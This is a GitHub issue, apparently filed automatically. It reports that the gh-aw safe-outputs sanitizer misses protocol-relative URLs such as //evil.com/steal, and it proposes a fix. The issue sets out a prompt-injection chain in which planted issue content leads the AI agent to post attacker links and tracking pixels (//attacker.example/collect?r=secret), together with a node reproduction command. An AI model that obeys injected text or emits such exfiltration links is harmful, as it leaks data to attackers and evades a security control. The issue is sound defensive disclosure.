Skip to content

safe-outputs sanitizer must treat //hostname protocol-relative URLs as blocked domains #23737

@szabta89

Description

@szabta89

Summary

The safe-outputs content sanitizer in sanitize_content_core.cjs (v0.64.4) does not match protocol-relative URLs of the form //hostname/path. Both sanitizeUrlProtocols() (requires explicit protocol:// prefix) and sanitizeUrlDomains() (anchored to https://) miss this form, so //evil.com/steal passes through both filters unmodified. Because GitHub.com is served over HTTPS, a browser resolves //evil.com/steal to (evil.com/redacted) — the same destination that sanitizeUrlDomains()` correctly blocks when the scheme is written explicitly. This contradicts the documented control that safe-outputs restricts AI-generated content to sanitized, allowlisted URLs.

Affected Area

Safe-outputs content sanitization — URL filtering layer (sanitize_content_core.cjs, functions sanitizeUrlProtocols ~line 178 and sanitizeUrlDomains ~line 225).

Reproduction Outline

  1. Configure a gh-aw workflow with safe-outputs: create-issue (or add-comment).
  2. Inject a protocol-relative URL into AI-generated output (e.g., via prompt injection in an issue body): [click here](//attacker.example/collect?r=secret).
  3. The AI includes this link in its safe-output body.
  4. Observe that sanitizeContentCore('[click here](//attacker.example/collect)') returns the input unchanged — the URL is not redacted.
  5. The GitHub API receives and stores the unsanitized link; a viewer clicking it is sent to `(attacker.example/redacted)

Direct verification:

node -e "
process.env.GITHUB_REPOSITORY = 'owner/repo';
const { sanitizeContentCore } = require(process.env.RUNNER_TEMP + '/gh-aw/safeoutputs/sanitize_content_core.cjs');
console.log(sanitizeContentCore('[click](//evil.com/steal)'));
// Expected: [click]((evil.com/redacted))
// Actual:   [click](//evil.com/steal)   ← not redacted
"

Observed Behavior

//evil.com/steal, [Legit link](//evil.com/steal), and ![Track me](//evil.com/pixel.gif) all pass through sanitizeContentCore() unchanged. Explicit `(evil.com/redacted) is correctly redacted.

Expected Behavior

Protocol-relative URLs (//hostname/path) should be treated equivalently to (hostname/redacted) by the domain allowlist check. Disallowed domains should be redacted to (hostname/redacted)` regardless of whether the scheme is explicit or protocol-relative.

Security Relevance

The exploit chain is: cross-prompt injection payload in issue/PR content → AI includes //attacker.example/... in safe-output body → sanitizer passes it unchanged → GitHub posts the link → maintainer clicks or image auto-loads in their browser, resolving to the attacker's HTTPS server. For image embeds (![](//attacker.example/pixel.gif)), GitHub's camo proxy still reveals to the attacker that the image was requested. This fully bypasses the URL domain allowlist, which is a documented and load-bearing security control.

Suggested fix: Extend sanitizeUrlProtocols to also match //hostname[/path] patterns and apply the same domain allowlist check, or normalize protocol-relative URLs to https:// before the existing sanitizeUrlDomains check. Add a regression test asserting //evil.com/path is treated equivalently to `(evil.com/redacted)

gh-aw version: v0.65.0 (finding reported against v0.64.4)

Original finding: https://github.com/githubnext/gh-aw-security/issues/1646

Generated by File Issue ·

Metadata

Metadata

Type

No type
No fields configured for issues without a type.

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions